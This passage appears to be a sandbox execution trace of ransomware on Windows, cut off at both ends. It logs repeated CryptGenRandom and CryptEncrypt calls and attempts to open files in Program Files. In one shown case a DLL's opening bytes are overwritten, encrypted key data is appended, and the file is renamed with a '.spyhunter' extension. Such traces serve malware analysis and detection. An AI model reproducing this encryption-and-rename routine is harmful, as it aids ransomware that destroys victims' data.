(HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.892] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc68*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc68*=0x30) returned 1 [0092.892] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_notes.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.892] GetProcessHeap () returned 0x2c0000 [0092.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.892] GetProcessHeap () returned 0x2c0000 [0092.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f238 | out: hHeap=0x2c0000) returned 1 [0092.892] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc68 | out: pbBuffer=0x25cfc68) returned 1 [0092.892] GetProcessHeap () returned 0x2c0000 [0092.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.892] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc60*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc60*=0x30) returned 1 [0092.892] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.893] GetProcessHeap () returned 0x2c0000 [0092.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.893] GetProcessHeap () returned 0x2c0000 [0092.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377ff0 | out: hHeap=0x2c0000) returned 1 [0092.894] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc68 | out: pbBuffer=0x25cfc68) returned 1 [0092.894] GetProcessHeap () returned 0x2c0000 [0092.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.894] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc60*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc60*=0x30) returned 1 [0092.894] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.894] GetProcessHeap () returned 0x2c0000 [0092.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.894] GetProcessHeap () returned 0x2c0000 [0092.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346b88 | out: hHeap=0x2c0000) returned 1 [0092.894] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc60 | out: pbBuffer=0x25cfc60) returned 1 [0092.894] GetProcessHeap () returned 0x2c0000 [0092.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.894] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc58*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc58*=0x30) returned 1 [0092.894] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\titlebuttonsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.894] GetProcessHeap () returned 0x2c0000 [0092.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.895] GetProcessHeap () returned 0x2c0000 [0092.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3553b0 | out: hHeap=0x2c0000) returned 1 [0092.895] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc60 | out: pbBuffer=0x25cfc60) returned 1 [0092.895] GetProcessHeap () returned 0x2c0000 [0092.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.895] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc58*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc58*=0x30) returned 1 [0092.895] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\titlebuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.895] GetProcessHeap () returned 0x2c0000 [0092.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.895] GetProcessHeap () returned 0x2c0000 [0092.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3780d8 | out: hHeap=0x2c0000) returned 1 [0092.895] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc58 | out: pbBuffer=0x25cfc58) returned 1 [0092.895] GetProcessHeap () returned 0x2c0000 [0092.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.895] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc50*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc50*=0x30) returned 1 [0092.896] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\scene_loop_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.900] GetProcessHeap () returned 0x2c0000 [0092.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.900] GetProcessHeap () returned 0x2c0000 [0092.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377e20 | out: hHeap=0x2c0000) returned 1 [0092.900] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc58 | out: pbBuffer=0x25cfc58) returned 1 [0092.901] GetProcessHeap () returned 0x2c0000 [0092.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.901] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc50*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc50*=0x30) returned 1 [0092.901] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\scene_loop.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.901] GetProcessHeap () returned 0x2c0000 [0092.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.901] GetProcessHeap () returned 0x2c0000 [0092.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346aa8 | out: hHeap=0x2c0000) returned 1 [0092.901] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc50 | out: pbBuffer=0x25cfc50) returned 1 [0092.901] GetProcessHeap () returned 0x2c0000 [0092.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.901] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc48*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc48*=0x30) returned 1 [0092.901] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\redmenu.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\redmenu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.901] GetProcessHeap () returned 0x2c0000 [0092.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.901] GetProcessHeap () returned 0x2c0000 [0092.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e3b0 | out: hHeap=0x2c0000) returned 1 [0092.902] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc50 | out: pbBuffer=0x25cfc50) returned 1 [0092.902] GetProcessHeap () returned 0x2c0000 [0092.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.902] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc48*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc48*=0x30) returned 1 [0092.902] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIconSubpi.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\previousmenubuttoniconsubpi.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.902] GetProcessHeap () returned 0x2c0000 [0092.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.902] GetProcessHeap () returned 0x2c0000 [0092.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a160 | out: hHeap=0x2c0000) returned 1 [0092.902] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc48 | out: pbBuffer=0x25cfc48) returned 1 [0092.902] GetProcessHeap () returned 0x2c0000 [0092.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.902] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc40*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc40*=0x30) returned 1 [0092.902] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\previousmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.902] GetProcessHeap () returned 0x2c0000 [0092.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.902] GetProcessHeap () returned 0x2c0000 [0092.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3555a0 | out: hHeap=0x2c0000) returned 1 [0092.903] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc48 | out: pbBuffer=0x25cfc48) returned 1 [0092.903] GetProcessHeap () returned 0x2c0000 [0092.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.903] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc40*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc40*=0x30) returned 1 [0092.903] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBE7INTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbe7intl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0092.947] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBE7INTL.DLL") returned 77 [0092.947] StrStrW (lpFirst="VBE7INTL.DLL", lpSrch=".txt") returned 0x0 [0092.947] GetProcessHeap () returned 0x2c0000 [0092.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c238e0 [0092.947] ReadFile (in: hFile=0x16c, lpBuffer=0x2c238e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfc04, lpOverlapped=0x0 | out: lpBuffer=0x2c238e0*, lpNumberOfBytesRead=0x25cfc04*=0x2800, lpOverlapped=0x0) returned 1 [0092.988] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.988] WriteFile (in: hFile=0x16c, lpBuffer=0x2c238e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfc04, lpOverlapped=0x0 | out: lpBuffer=0x2c238e0*, lpNumberOfBytesWritten=0x25cfc04*=0x2800, lpOverlapped=0x0) returned 1 [0092.988] GetProcessHeap () returned 0x2c0000 [0092.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c238e0 | out: hHeap=0x2c0000) returned 1 [0092.989] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.989] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfc44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfc04, lpOverlapped=0x0 | out: lpBuffer=0x25cfc44*, lpNumberOfBytesWritten=0x25cfc04*=0x4, lpOverlapped=0x0) returned 1 [0093.035] WriteFile (in: hFile=0x16c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfc04, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfc04*=0x30, lpOverlapped=0x0) returned 1 [0093.035] CloseHandle (hObject=0x16c) returned 1 [0093.041] GetProcessHeap () returned 0x2c0000 [0093.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c21098 [0093.042] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBE7INTL.DLL.spyhunter") returned 87 [0093.042] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBE7INTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbe7intl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBE7INTL.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbe7intl.dll.spyhunter")) returned 1 [0093.043] GetProcessHeap () returned 0x2c0000 [0093.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0093.043] GetProcessHeap () returned 0x2c0000 [0093.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0093.043] GetProcessHeap () returned 0x2c0000 [0093.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377428 | out: hHeap=0x2c0000) returned 1 [0093.044] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc40 | out: pbBuffer=0x25cfc40) returned 1 [0093.044] GetProcessHeap () returned 0x2c0000 [0093.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0093.044] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc38*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc38*=0x30) returned 1 [0093.044] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\panel_mask.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.056] GetProcessHeap () returned 0x2c0000 [0093.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0093.056] GetProcessHeap () returned 0x2c0000 [0093.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3781c0 | out: hHeap=0x2c0000) returned 1 [0093.056] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc40 | out: pbBuffer=0x25cfc40) returned 1 [0093.056] GetProcessHeap () returned 0x2c0000 [0093.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0093.057] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc38*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc38*=0x30) returned 1 [0093.057] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.057] GetProcessHeap () returned 0x2c0000 [0093.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0093.057] GetProcessHeap () returned 0x2c0000 [0093.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381988 | out: hHeap=0x2c0000) returned 1 [0093.057] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc38 | out: pbBuffer=0x25cfc38) returned 1 [0093.057] GetProcessHeap () returned 0x2c0000 [0093.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0093.057] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc30*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc30*=0x30) returned 1 [0093.057] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.057] GetProcessHeap () returned 0x2c0000 [0093.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0093.057] GetProcessHeap () returned 0x2c0000 [0093.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37b110 | out: hHeap=0x2c0000) returned 1 [0093.058] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc38 | out: pbBuffer=0x25cfc38) returned 1 [0093.058] GetProcessHeap () returned 0x2c0000 [0093.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0093.058] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc30*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc30*=0x30) returned 1 [0093.058] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.058] GetProcessHeap () returned 0x2c0000 [0093.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0093.058] GetProcessHeap () returned 0x2c0000 [0093.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x375928 | out: hHeap=0x2c0000) returned 1 [0093.058] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc30 | out: pbBuffer=0x25cfc30) returned 1 [0093.058] GetProcessHeap () returned 0x2c0000 [0093.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0093.058] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc28*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc28*=0x30) returned 1 [0093.058] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.058] GetProcessHeap () returned 0x2c0000 [0093.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0093.058] GetProcessHeap () returned 0x2c0000 [0093.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37a750 | out: hHeap=0x2c0000) returned 1 [0093.059] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc30 | out: pbBuffer=0x25cfc30) returned 1 [0093.059] GetProcessHeap () returned 0x2c0000 [0093.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0093.059] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc28*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc28*=0x30) returned 1 [0093.059] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.059] GetProcessHeap () returned 0x2c0000 [0093.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0093.059] GetProcessHeap () returned 0x2c0000 [0093.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381880 | out: hHeap=0x2c0000) returned 1 [0093.059] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc28 | out: pbBuffer=0x25cfc28) returned 1 [0093.059] GetProcessHeap () returned 0x2c0000 [0093.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0093.059] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc20*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc20*=0x30) returned 1 [0093.059] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\blackbars80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.059] GetProcessHeap () returned 0x2c0000 [0093.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0093.059] GetProcessHeap () returned 0x2c0000 [0093.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377ff0 | out: hHeap=0x2c0000) returned 1 [0093.060] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc28 | out: pbBuffer=0x25cfc28) returned 1 [0093.060] GetProcessHeap () returned 0x2c0000 [0093.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0093.060] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc20*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc20*=0x30) returned 1 [0093.060] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\bandwidth.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\bandwidth.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.060] GetProcessHeap () returned 0x2c0000 [0093.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0093.060] GetProcessHeap () returned 0x2c0000 [0093.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377d38 | out: hHeap=0x2c0000) returned 1 [0093.060] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc20 | out: pbBuffer=0x25cfc20) returned 1 [0093.060] GetProcessHeap () returned 0x2c0000 [0093.060] RtlAllocateHeap 